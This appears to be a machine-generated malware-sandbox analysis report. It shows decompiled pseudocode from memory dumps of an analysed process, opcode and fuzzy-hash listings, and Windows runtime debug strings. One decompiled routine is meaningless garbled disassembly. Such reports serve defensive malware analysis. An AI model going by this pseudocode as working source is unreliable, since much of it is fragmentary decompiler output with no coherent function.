                                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                          												__eflags = _t469;
                                          												while(1) {
                                          													 *(_t528 - 0xe4) = _t511;
                                          													__eflags = _t392;
                                          													_t393 = _t427;
                                          													if(_t392 != 0) {
                                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                                          													}
                                          													_t395 = (_t393 & 0x000000ff) - _t427;
                                          													__eflags = _t395;
                                          													if(_t395 == 0) {
                                          														_t511 = _t511 +  *_t469;
                                          														__eflags = _t511;
                                          													} else {
                                          														_t398 = _t395 - 1;
                                          														__eflags = _t398;
                                          														if(_t398 == 0) {
                                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                          														} else {
                                          															__eflags = _t398 == 1;
                                          															if(_t398 == 1) {
                                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                          																_t402 =  *_t469 & 0x0000ffff;
                                          																 *(_t528 - 0xac) = _t402;
                                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          															}
                                          														}
                                          													}
                                          													__eflags = _t511 -  *(_t528 - 0xe4);
                                          													if(_t511 <  *(_t528 - 0xe4)) {
                                          														break;
                                          													}
                                          													_t397 =  *(_t528 - 0x88) + 1;
                                          													 *(_t528 - 0x88) = _t397;
                                          													_t469 = _t469 + 0x10;
                                          													__eflags = _t397 -  *(_t528 + 0x1c);
                                          													_t392 =  *(_t528 - 0xa2);
                                          													if(_t397 <  *(_t528 + 0x1c)) {
                                          														continue;
                                          													}
                                          													goto L45;
                                          												}
                                          												_t475 = 0x216;
                                          												 *(_t528 - 0x74) = 0x216;
                                          												goto L45;
                                          											}
                                          										} else {
                                          											asm("lock dec dword [eax+ecx*8+0x4]");
                                          											goto L16;
                                          										}
                                          									}
                                          									_t491 = E00ED4CAB(_t306, _t528 - 0xa4);
                                          									 *(_t528 - 0x74) = _t491;
                                          									__eflags = _t491;
                                          									if(_t491 != 0) {
                                          										goto L91;
                                          									} else {
                                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          										goto L20;
                                          									}
                                          								}
                                          								L16:
                                          								 *(_t528 - 0x74) = 0x1069;
                                          								L93:
                                          								_t298 =  *(_t528 - 0xd0) + 1;
                                          								 *(_t528 - 0xd0) = _t298;
                                          								_t474 = _t474 + _t511;
                                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          								_t494 = 4;
                                          								__eflags = _t298 - _t494;
                                          								if(_t298 >= _t494) {
                                          									goto L100;
                                          								}
                                          								_t494 =  *(_t528 - 0xcc);
                                          								_t435 = _t298;
                                          								continue;
                                          							}
                                          							__eflags = _t494[2] | _t494[3];
                                          							if((_t494[2] | _t494[3]) == 0) {
                                          								goto L15;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = _t301;
                                          						if(_t301 != 0) {
                                          							goto L92;
                                          						}
                                          						goto L10;
                                          						L92:
                                          						goto L93;
                                          					}
                                          				} else {
                                          					_push(0x57);
                                          					L101:
                                          					return E00E5D130(_t427, _t494, _t511);
                                          				}
                                          			}

                                          0x00ed5f3a
                                          0x00ed5f3d
                                          0x00ed5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ed5f46
                                          0x00ed5f48
                                          0x00ed5f4d
                                          0x00000000
                                          0x00ed5f4d
                                          0x00ed5dda
                                          0x00ed5ddf
                                          0x00000000
                                          0x00ed5ddf
                                          0x00ed5dd8
                                          0x00ed5da7
                                          0x00ed5da9
                                          0x00ed5dac
                                          0x00ed5dae
                                          0x00000000
                                          0x00ed5db4
                                          0x00ed5db4
                                          0x00000000
                                          0x00ed5db4
                                          0x00ed5dae
                                          0x00ed5d88
                                          0x00ed5d8d
                                          0x00ed6363
                                          0x00ed6369
                                          0x00ed636a
                                          0x00ed6370
                                          0x00ed6372
                                          0x00ed637a
                                          0x00ed637b
                                          0x00ed637d
                                          0x00000000
                                          0x00000000
                                          0x00ed637f
                                          0x00ed6385
                                          0x00000000
                                          0x00ed6385
                                          0x00ed5d38
                                          0x00ed5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ed5d3b
                                          0x00ed5d27
                                          0x00ed5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00ed6360
                                          0x00000000
                                          0x00ed6360
                                          0x00ed5c10
                                          0x00ed5c10
                                          0x00ed63da
                                          0x00ed63e5
                                          0x00ed63e5

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f232e4c19539b93a10cc4e4284aa3224c52ba34d1594a907d7f9987b09248e06
                                          • Instruction ID: 6e4dc5091e6089f11985a947683f63baee1f1b2fc7fea8e44d8414df461384e6
                                          • Opcode Fuzzy Hash: f232e4c19539b93a10cc4e4284aa3224c52ba34d1594a907d7f9987b09248e06
                                          • Instruction Fuzzy Hash: FA424975A00629CFDB24CF68C881BA9B7B1FF49304F1591AAD94DEB342D7349A86CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ffbf9a69218328033fe847e590f1664ef9c1c8a4f5f67fbae1078f13a9f799c
                                          • Instruction ID: 2ec7424d87bfb58ac2e8dea801e1fdcca1ccc8abd31da6e018c220c1ae8fd256
                                          • Opcode Fuzzy Hash: 5ffbf9a69218328033fe847e590f1664ef9c1c8a4f5f67fbae1078f13a9f799c
                                          • Instruction Fuzzy Hash: 80F1A0B45082218BC714DF19E480A7AB7E1FF98748F14692EF496EB3A0E734DD81DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3eaee5a7c91c502afc48756632fd143ce0da06046e24c2cd65d7139b9d13503
                                          • Instruction ID: ad0aa3f4180fc5ddbb5e4b5058d03525f6c0f6d2bdd8c2e3539f48589fc33b93
                                          • Opcode Fuzzy Hash: b3eaee5a7c91c502afc48756632fd143ce0da06046e24c2cd65d7139b9d13503
                                          • Instruction Fuzzy Hash: FDF10132A08741DFD725CB28C94476B7BE1AFC5318F14A52DEA99BB290D774DC41CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2410431ea4f72ccbde56b985392962bf2ee8224922ab8e871c5e2ea07d2b8137
                                          • Instruction ID: 88ea4569ccaded9990b4168de3143534bb45aa90004e0785fec21d9e176b7bf4
                                          • Opcode Fuzzy Hash: 2410431ea4f72ccbde56b985392962bf2ee8224922ab8e871c5e2ea07d2b8137
                                          • Instruction Fuzzy Hash: 65E1C130A043198FDB24DF14DD44BE9B7B2BF85308F1421A9E949BB291DB74ADC5CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14eab1a0662326e3e0fb19cd5d8262517da6e91ffc6ba2ef55c4d21481223ab7
                                          • Instruction ID: 3e589f3dc1ee126efc5350acae7638136720aecfff603f04992318619fcae456
                                          • Opcode Fuzzy Hash: 14eab1a0662326e3e0fb19cd5d8262517da6e91ffc6ba2ef55c4d21481223ab7
                                          • Instruction Fuzzy Hash: 0BB16D70E04219DFCB14CF99DA84AEDBBB9FF45304F20612AE415BB246DB70AD85CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 77b375ab6a7a562780e96081669345a6cf2bd67e3c23fdf7fbbd65d2d7175761
                                          • Instruction ID: cb908e63f598bac460bd5d130ad1a45a9c2611e98db67d1edb2654880b32e4c6
                                          • Opcode Fuzzy Hash: 77b375ab6a7a562780e96081669345a6cf2bd67e3c23fdf7fbbd65d2d7175761
                                          • Instruction Fuzzy Hash: 7AC123756097808FD354CF28C480A5AFBF1BF88308F14996EF8999B362D771E945CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc8f346cb01c8edffc37f0b7d789550dd0329fbaf72180114b5a228cfdf2a6c7
                                          • Instruction ID: 06c4558843731ffd5f4b653832c89134101683aa5ce5bfd187b581567a591416
                                          • Opcode Fuzzy Hash: fc8f346cb01c8edffc37f0b7d789550dd0329fbaf72180114b5a228cfdf2a6c7
                                          • Instruction Fuzzy Hash: 78915971E00214AFEB319B68C858BBEBBE5AF41728F156261FA64BB2D1D7749D00C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 268fc4e3df0744c0f5a2bed63aa8c34985cd150af9245befd866012c2c78ae26
                                          • Instruction ID: fbb0c741ceeaed2b7821a1a5813790b6f9437b08419203ddd0aa9ac5b4105dfa
                                          • Opcode Fuzzy Hash: 268fc4e3df0744c0f5a2bed63aa8c34985cd150af9245befd866012c2c78ae26
                                          • Instruction Fuzzy Hash: C681837560C2029BDB25CF14C881A7E77E5EB84394F25D96AFDC9AB241E330DD44CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ec687fbee3803d2294c8f273844ad706c990bdf690b6ba96858eb05a1ab8020
                                          • Instruction ID: 535fcc3bd18aedd05e9cfda4993c791957c087e48f54d25b06b858cde5e417d2
                                          • Opcode Fuzzy Hash: 6ec687fbee3803d2294c8f273844ad706c990bdf690b6ba96858eb05a1ab8020
                                          • Instruction Fuzzy Hash: 8871FE32200701AFDB32CF14EA46F66B7F5EB84724F245528E655AB2E1EBB5E940CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: cadd55e0a755ed8ca237d3279bf247a6937ddb14cee9da182c78b19044df026d
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: 28716B71A00219AFCB10EFA4D984AAEBBF9FF48714F105069E549FB251DB30EE41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1403b395c74f4a5fe77d033d5921210f793ef5b7e5bdd3e117646364cf0cf36
                                          • Instruction ID: dfb6df98a818729dc219b2bfab31512fb6317c10d4a3e7449bfffcb4c3a1f13d
                                          • Opcode Fuzzy Hash: c1403b395c74f4a5fe77d033d5921210f793ef5b7e5bdd3e117646364cf0cf36
                                          • Instruction Fuzzy Hash: 2551FE312487529FD721DF68D842B67BBE4FF90714F20191AF4C5A36A2E770E884CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ed7ef19d45275acbfbe92a9a833a649033ec60e7f56ab1461420a7b6830b888
                                          • Instruction ID: 1675c03137d9705346835a64e5556b9c48c94663920dae5adf9d9e590a39be6b
                                          • Opcode Fuzzy Hash: 5ed7ef19d45275acbfbe92a9a833a649033ec60e7f56ab1461420a7b6830b888
                                          • Instruction Fuzzy Hash: B2519E76B001258FCB14DF19C8989BDBBB1FB88704B16945EE996BB320D730AE51DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5632199392f30878dce32e54b19d66bd927e16d44cdc1b9e46418ba504661d27
                                          • Instruction ID: e918857959de76c9d4183cccc5ad6c6da1ee9f3b1409f940a030b86bce7a23db
                                          • Opcode Fuzzy Hash: 5632199392f30878dce32e54b19d66bd927e16d44cdc1b9e46418ba504661d27
                                          • Instruction Fuzzy Hash: CF41F5717002585BC7258B25CA84F7BB399AF8431CF1C522DF816A7290DB72DC43C6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ff7534418b0c43b0a7aca12c8c9455e2a731ce0b2e64d2f60fcedb749355826
                                          • Instruction ID: fa1073c0acdc4170e5bea1d2d711de76ba3f5b0d59e84cd087c6b45e7f013b06
                                          • Opcode Fuzzy Hash: 7ff7534418b0c43b0a7aca12c8c9455e2a731ce0b2e64d2f60fcedb749355826
                                          • Instruction Fuzzy Hash: 4C519DB5A04629DFCB14CF68D881AAEFBF1BB48310F25925AD659F7340DB70AD44CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: a3d58f0a8c4315a08bfedcffe2dccbca6f9db026576cf241547c93caa94ae5b7
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 9251E430E042499FDB14CB68C0947EEBBB1AF19318F2491B8E845A7382C375ADCAD791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: a04af2356f0d82a0e41e8b9000b1290d7a46e088cc6436746242253c53ddb26c
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: E0516D71604606EFCB15CF14D581A96BBF5FF45308F15C1AAE908AF352E371E946CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 980a41fa6ba0fa941efa7daf905434d91eeabc4df89164b5c2ebaa769d469bb4
                                          • Instruction ID: d0199344b47a6f221107bde73b67b620a25b58f808f92c3c410294f4fb1678b3
                                          • Opcode Fuzzy Hash: 980a41fa6ba0fa941efa7daf905434d91eeabc4df89164b5c2ebaa769d469bb4
                                          • Instruction Fuzzy Hash: 1A516431A00219DFCF25DF55C884ADEBBB1BF48314F15A019FA44BB260C3319D92CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8fe875ee2298761516bba5558ac812e97d789a4aa8cd68a7b78e71dce4c757b
                                          • Instruction ID: 178d4e6f674fb804d04592a1643fe595928ee8fff6156976d1db5ffe69801538
                                          • Opcode Fuzzy Hash: d8fe875ee2298761516bba5558ac812e97d789a4aa8cd68a7b78e71dce4c757b
                                          • Instruction Fuzzy Hash: 3641D271A016289BDB20DF64C945FEAB7B4EF45744F0160A6E90CBB281DB74EE80CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d65db69a306df8728e4f7c28d7374cce4a7828e233bad1df626242332439f26
                                          • Instruction ID: 41c9f35d31e6b5ebb4bfb11911ab38c169acbd4520453c07d2b00abfdd8d87cd
                                          • Opcode Fuzzy Hash: 5d65db69a306df8728e4f7c28d7374cce4a7828e233bad1df626242332439f26
                                          • Instruction Fuzzy Hash: 2541F3B1A003189FEB21DF15CC85FAABBE9EB44704F045099E949BB2C1D770ED44CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d85cc3a59357773d8a1367bdb177d3798b5ff04ebeaa41e1c8c3718ad7859d81
                                          • Instruction ID: ba8fc14323462eed39ecf0cfb7d7edbea3e46dcd4e6eccbcf52b587ef91ebe6c
                                          • Opcode Fuzzy Hash: d85cc3a59357773d8a1367bdb177d3798b5ff04ebeaa41e1c8c3718ad7859d81
                                          • Instruction Fuzzy Hash: A84182B4A0422C9BDB64DF15DD88AE9B7F4EF94304F1051EAE819A7242EB709EC0CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: 06bddd3ad5fe94b62b67e8b612664e779e2a50d20cd111efafad2d6742ebbc81
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: EF311372B001086BDB158B69CA45FBFFBABEF84318F19507DE814F7252DA729D02C651
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: 0afede5b4e07c5b0046b9c1433a0f0cadbd2f3ff9d88a5798f1fda8c2094c9a5
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: A53126323006406FC7229768CA55F6A7BEBEB85350F18607DF846AB352DA72DC03C710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: a3e232feb631ee991777f72da5272ab9856a3292fc77022dd687be0910e3e103
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: C631CE32604705AFC729DF24C981E6BB7E9FBC0310F04592DF556A7741DA31E806CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          • Instruction ID: 7cc17dd2206ebd5c35bf953cf72f74df9c63b95ac3a458dda8e36fad63720076
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: E2018F72704519ABC720DE6ECC45E9B7BFDEB88B60F241534B988EB254DA30DD41C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dff82ef034aa490c828f0342448098211055faf6dd143a74429d43f92c4547c7
                                          • Instruction ID: ead7427d9a3b697ef4cbbd968f30ecfdbc2eeee0b07d64c5c0c2b32d6a2be2c4
                                          • Opcode Fuzzy Hash: dff82ef034aa490c828f0342448098211055faf6dd143a74429d43f92c4547c7
                                          • Instruction Fuzzy Hash: 7B01FFB36026048FC3248F18D840B26BBE9EB95325F216076E205AB6E7C370DC81CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a7cdf75725a6dd8e43bce11aedfde5ead3540bc1275bd32a11b95778d821db5
                                          • Instruction ID: 861f0ed6e7af71572b33627d1405e12f91c35a126db653c9e8e5e790b772336f
                                          • Opcode Fuzzy Hash: 6a7cdf75725a6dd8e43bce11aedfde5ead3540bc1275bd32a11b95778d821db5
                                          • Instruction Fuzzy Hash: EDF01C74511708CECB60FFA6DA0172436E4F784311F2062A7A500F72E5CB744489CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: a9781a11bc03c354762971a829c56c093d96d46483b8d4b6f8e0a1701d8ab950
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: 1CE0C231288614BBDB225E44CC01FAA7B96DB507A1F204031FE087A792C6759C91E6D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41e9bcccb987143b457423c4e89e18efc4f5747901c9437b2aba7dae6b61a584
                                          • Instruction ID: c4526462ada86c83bdf995dee19356870eef89e7def4916060b4fb1cd3a0b5f4
                                          • Opcode Fuzzy Hash: 41e9bcccb987143b457423c4e89e18efc4f5747901c9437b2aba7dae6b61a584
                                          • Instruction Fuzzy Hash: 92D02EA21220042BCF2C2710AC1AF312652E7D0700F38287EF2833B9E5DAA088D4C20A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ef068a03d07fa190f04e1c11324368569c3f7ec509ffc295b20de752c943d4e
                                          • Instruction ID: 9d50ed4c89ac3ae1880cfc5ae0e8919eff368011be6fdecc560800798c35ebc2
                                          • Opcode Fuzzy Hash: 2ef068a03d07fa190f04e1c11324368569c3f7ec509ffc295b20de752c943d4e
                                          • Instruction Fuzzy Hash: ACD0A77110014053DA2D5B11980AB143691DFC0789F3820EDF207794C1CFB0DC92E448
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040C122(void* __edi) {
                                          
                                          				 *0x00000038 =  *0x00000038 >> 0x72;
                                          				asm("loopne 0x7");
                                          				asm("int 0x89");
                                          				return 0xa5;
                                          			}




                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          C-Code - Quality: 53%
                                          			E00E9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E00E4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E00E95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E00E95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9FDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00E9FE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00E9FE2B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Executed Functions

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c17919f00d3a59096408562e6a10d939b3f2d53ee378281233c7a5039d349494
                                          • Instruction ID: dea80ba77c6d656e48c8790149b3b7111a6680493485cb09c860706b3570feec
                                          • Opcode Fuzzy Hash: c17919f00d3a59096408562e6a10d939b3f2d53ee378281233c7a5039d349494
                                          • Instruction Fuzzy Hash: A3D17C31B002199FDB00DFA9C950BAEBBF6BF84304F258569E5459B799DB70EC46CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000013.00000002.483366297.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f361ea3a7412c3448cb2090be582ab061530a1a82b94375db5b76ff867ce3afe
                                          • Instruction ID: 539e8b9457927212e00e7172907570034edebd4f855e778bb33d766e98f58343
                                          • Opcode Fuzzy Hash: f361ea3a7412c3448cb2090be582ab061530a1a82b94375db5b76ff867ce3afe
                                          • Instruction Fuzzy Hash: 1211C471A0C11DCBCB04869A88816BEBBADBB45730F148522E1CE9F349D232AC4587E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
